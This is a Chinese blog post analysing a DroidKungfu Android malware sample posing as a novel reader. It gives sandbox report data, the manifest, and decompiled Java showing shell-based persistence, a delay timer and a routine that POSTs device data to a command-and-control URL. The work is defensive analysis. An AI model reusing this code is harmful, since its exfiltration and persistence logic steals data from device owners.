DroidKungfu系列病毒分析（一）

今天才拿到病毒包……随便点开一个看一下吧

于是我们点开了这个星辰变全集

先提交到http://mobilesandbox.org/上面看下 发现有这个的报告了 于是我们直接先来看下静态分析的报告

APK Infos

Sample SHA256:c98a251054c26468cfbfc6fbaf3bd1a55fdb500045f07eafa1127bed95fc8bc7Sample MD5:bddf9a9a8769b70f7f5772199b0cacb0Sample ssdeep:49152:obInu5AxuRmfTKVbx0Zg0rpMjOYeY94D1ywI8TLYlB5CWug5IP+0RNjQI:obInyOfTKVb6hpzYeY+Do2WqfgO+YfAPK Name:02d2e109d16d160f77a645f44314fedcdbcd6e18.apkPackage Name:com.allen.txtxcbSDK Version:4Files inside the APK-package:META-INF/MANIFEST.MF
META-INF/GOOGLE_I.SF
META-INF/GOOGLE_I.RSA
assets/gjsvro
assets/killall
assets/legacy
assets/ratc
assets/xcb.txt
lib/armeabi/libnative.so
res/drawable-mdpi/bg.png
res/drawable-mdpi/bg1.jpg
res/drawable-mdpi/bg2.jpg
res/drawable-mdpi/bg3.jpg
res/drawable-mdpi/bg4.jpg
res/drawable-mdpi/bg5.jpg
res/drawable-mdpi/bg6.jpg
res/drawable-mdpi/icon.png
res/drawable-mdpi/settingbg.jpg
res/layout/anim_alpha.xml
res/layout/anim_l_to_r.xml
res/layout/anim_r_to_l.xml
res/layout/main.xml
res/layout/mainlarge.xml
res/layout/mainsmall.xml
res/layout/setting.xml
res/layout/viewfile.xml
res/menu/menu.xml
AndroidManifest.xml
classes.dex
resources.arsc

Static Analyzer V1
    -- Report --

Sample SHA256:c98a251054c26468cfbfc6fbaf3bd1a55fdb500045f07eafa1127bed95fc8bc7Sample MD5:bddf9a9a8769b70f7f5772199b0cacb0Sample ssdeep:49152:obInu5AxuRmfTKVbx0Zg0rpMjOYeY94D1ywI8TLYlB5CWug5IP+0RNjQI:obInyOfTKVb6hpzYeY+Do2WqfgO+YfStart of Analysis:Sept. 14, 2012, 8:46 a.m.End of Analysis:Sept. 14, 2012, 8:46 a.m.Used Features:android.hardware.location
android.hardware.location.gps
android.hardware.wifi
android.hardware.touchscreen
android.hardware.screen.portraitRequested Permissions from Android Manifest:android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.ACCESS_NETWORK_STATE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_FINE_LOCATION
android.permission.READ_LOGS
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_WIFI_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.INSTALL_PACKAGESUsed Permissions:android.permission.INTERNET
android.permission.ACCESS_NETWORK_STATE
android.permission.READ_LOGS
android.permission.READ_PHONE_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.CHANGE_WIFI_STATE
android.permission.ACCESS_FINE_LOCATIONResponsible API calls for used Permissions:java/net/Socket
android/content/Context;->startService
android/net/ConnectivityManager;->getNetworkInfo
java/lang/Runtime;->exec
android/telephony/TelephonyManager;->getDeviceId
android/net/wifi/WifiManager;->getWifiState
android/net/wifi/WifiManager;->setWifiEnabled
android/location/LocationManager;->getLastKnownLocationUsed Intents:android.intent.action.MAIN
android.intent.category.LAUNCHER
android.intent.action.BATTERY_CHANGED_ACTION
android.intent.action.SIG_STR
android.intent.action.BOOT_COMPLETEDUsed Activities:.txtReader
com.google.ssearch.Dialog
.ViewFileAct_Float
SettingsPotentially dangerous Calls:printStackTrace
Cipher(AES)
Read/Write External Storage
getSystemService
Execution of external commands
getDeviceId
HttpPost
system/bin/su
getWifiState
setWifiEnabled
getSubscriberIdUsed Services and Receiver:com.google.ssearch.SearchService
com.google.ssearch.ReceiverUsed Providers: Used Networks: Found URLs:http://search.gongfu-android.com:8511/search/sayhi.php
http://search.gongfu-android.com:8511/search/getty.php
http://search.gongfu-android.com:8511/search/rpty.php
http://static.youmi.net/files/pic/320.png
http://static.youmi.net/files/pic/176.png
http://static.youmi.net/files/pic/240.png
http://static.youmi.net/files/pic/480.png
http://schemas.android.com/apk/res/
http://gw.youmi.net/reqad
http://gw.youmi.net/prsad
http://gw.youmi.net/clkad
http://gw.youmi.net/effad
http://gw.youmi.net/cacapp
http://ditu.google.cn/staticmap?center=

那么我们下来开始正式的分析过程

首先拖到APKIDE 然后进行反编译 再把CLASS.DEX转换成JAR

准备工作完毕

下面可以看到在AndroidManifest.xml的信息

<?xml version="1.0" encoding="utf-8"?><manifest android:versionCode="1" android:versionName="1.0" package="com.allen.txtxcb"  xmlns:android="http://schemas.android.com/apk/res/android">    <application android:label="@string/app_name" android:icon="@drawable/icon">        <activity android:theme="@android:style/Theme.NoTitleBar" android:label="@string/app_name" android:name=".txtReader" android:screenOrientation="portrait">            <intent-filter>                <action android:name="android.intent.action.MAIN" />                <category android:name="android.intent.category.LAUNCHER" />            </intent-filter>        </activity>        <activity android:theme="@android:style/Theme.Dialog" android:name="com.google.ssearch.Dialog" android:configChanges="keyboardHidden|orientation" />        <service android:name="com.google.ssearch.SearchService" />        <receiver android:name="com.google.ssearch.Receiver">            <intent-filter>                <action android:name="android.intent.action.BATTERY_CHANGED_ACTION" />                <action android:name="android.intent.action.SIG_STR" />                <action android:name="android.intent.action.BOOT_COMPLETED" />            </intent-filter>        </receiver>        <activity android:theme="@android:style/Theme.NoTitleBar" android:name=".ViewFileAct_Float" android:screenOrientation="portrait" />        <activity android:theme="@android:style/Theme.NoTitleBar" android:name="Settings" android:screenOrientation="portrait" />        <meta-data android:name="Wooboo_PID" android:value="f3581d02a4324338bba52dd7e4faa94a" />        <meta-data android:name="Market_ID" android:value="1" />        <meta-data android:name="GH_APPKEY" android:value="d6a36e24c86f5ecd758629154669f343" />    </application>    <uses-permission android:name="android.permission.INTERNET" />    <uses-permission android:name="android.permission.READ_PHONE_STATE" />    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />    <uses-permission android:name="android.permission.READ_LOGS" />    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />    <uses-permission android:name="android.permission.INSTALL_PACKAGES" /></manifest>

程序的包名：com.allen.txtxcb

程序有2个Activity：android.intent.action.MAIN 和 android.intent.category.LAUNCHER

程序有3个元数据：

Wooboo_PID        value = "f3581d02a4324338bba52dd7e4faa94a"

Market_ID              value = "1"

GH_APPKEY        value = "d6a36e24c86f5ecd758629154669f343"

程序有1个Service：com.google.ssearch.SearchService

程序有1个BroadcastReceiver：com.google.ssearch.Receiver

程序使用到以下权限：

<uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <uses-permission android:name="android.permission.READ_LOGS" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.INSTALL_PACKAGES" />

===================================================================================================================

可以看到 在这个SearchService上面会调用MyThread来安装这个恶意的google.ssearch

 public void run()    {      ApplicationInfo localApplicationInfo = SearchService.this.getApplicationInfo();      Utils.runsh("/data/data/" + localApplicationInfo.packageName + "/killall /data/data/" + localApplicationInfo.packageName, "");      try      {        sleep(5000L);        label50:        if (new File("/system/bin/gjsvr").exists())        {          Utils.runsh("/system/bin/gjsvr", "");          android.os.Process.killProcess(android.os.Process.myPid());          return;        }        Utils.runsh("am", "startservice -n " + localApplicationInfo.packageName + "/com.google.ssearch.SearchService");        Intent localIntent = SearchService.this.getBaseContext().getPackageManager().getLaunchIntentForPackage(SearchService.this.getBaseContext().getPackageName());        localIntent.addFlags(134217728);        localIntent.addFlags(4194304);        localIntent.addFlags(65536);        SearchService.this.startActivity(localIntent);        android.os.Process.killProcess(android.os.Process.myPid());        return;      }      catch (InterruptedException localInterruptedException)      {        break label50;      }    }

google.ssearch包分析

然后定位到OnCreate()方法处

public void onCreate()  {    super.onCreate();    SharedPreferences localSharedPreferences = getSharedPreferences("sstimestamp", 0);    long l1 = localSharedPreferences.getLong("start", 0L);    long l2 = System.currentTimeMillis();    if (l1 == 0L)    {      SharedPreferences.Editor localEditor = localSharedPreferences.edit();      localEditor.putLong("start", l2);      localEditor.commit();      stopSelf();      return;    }    if (l2 - l1 < 14400000L)    {      stopSelf();      return;    }    this.mPreferences = getSharedPreferences("permission", 0);    if (Utils.isConnected(this)) {      doSearchReport();    }    getPermission();    provideService();  }

那么我们可以看到命名了2个LONG型的变量 并且将l1初始化为0L  如果l1的值等于0L那么我们将l2的值赋给l1

而我们可以看到程序调用的这个System.currentTimeMillis();函数来作为l2的值 那么我们查询下这个的含义如下

1、  意义：currentTimeMillis()返回以毫秒为单位的当前时间，返回的是当前时间与协调世界时 1970 年 1 月 1 日午夜之间的时间差（以毫秒为单位测量）。注意，当返回值的时间单位是毫秒时，值的粒度取决于基础操作系统，并且粒度可能更大。例如，许多操作系统以几十毫秒为单位测量时间。2、  用处：（1）      用来测试程序的运行时间：publicclass TestTime{           public static void main(String[] args){        String str = new String("0");        long time1 =System.currentTimeMillis();        for(int i=0;i<10000;i++){            str += i;        }        long time2 =System.currentTimeMillis();        System.out.println("for循环共用了" + (time2 - time1) + "毫秒。");    }}（2）      控制线程时间，刷新屏幕频率：  time1 = System.currentTimeMillis();#你所运行的程序time2 = System.currentTimeMillis();if (time2 - time1 < 60) {try {Thread.sleep(60 - (time2 - time1));} catch (InterruptedException e) {}}（3）      生成不重复的文件名：     public String getName(){     Stringdate1 = null;     SimpleDateFormatsdf1 = new SimpleDateFormat("yyyyMMddHHmmssSSS");     date1= sdf1.format(new Date(System.currentTimeMillis()))+".txt";     return date1;}

那么这里应该是来计算程序运行时间的
再往下看 还强制调用了一个doSearchReport();
我们跟进进去看到这个doSearchReport();

for (;;)    {      HttpPost localHttpPost = new HttpPost("http://search.gongfu-android.com:8511/search/sayhi.php");      try      {        localHttpPost.setEntity(new UrlEncodedFormEntity(localArrayList, "UTF-8"));        new DefaultHttpClient().execute(localHttpPost).getStatusLine().getStatusCode();        return;      }      catch (Exception localException) {}      localArrayList.add(new BasicNameValuePair("root", "0"));    }

将你的信息Post到了这个恶意网址上 貌似这个网站已经挂了
然后先后分别调用getPermission(); 以及provideService();
分别跟进进去看一下getPerimission()会根据不同情况再来调用getPerimission1()，getPerimission2()，getPerimission3()这三个函数来进行提权

恶意程序获得了权限过后就会调用这个provideService()服务来坑人了

功能应该是窃取用户的权限，然后传输心跳包并且不停的轮训执行服务器的指令。

 public static boolean isConnected(Context paramContext)  {    ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");    if (localConnectivityManager.getNetworkInfo(1).isConnected()) {      return true;    }    return localConnectivityManager.getNetworkInfo(0).isConnected();  }

由于篇幅和版面问题，具体的代码就不再贴出来，总之里面有一大堆恶心的窃取隐私函数和执行服务器轮训指令的函数 真是丧心病狂。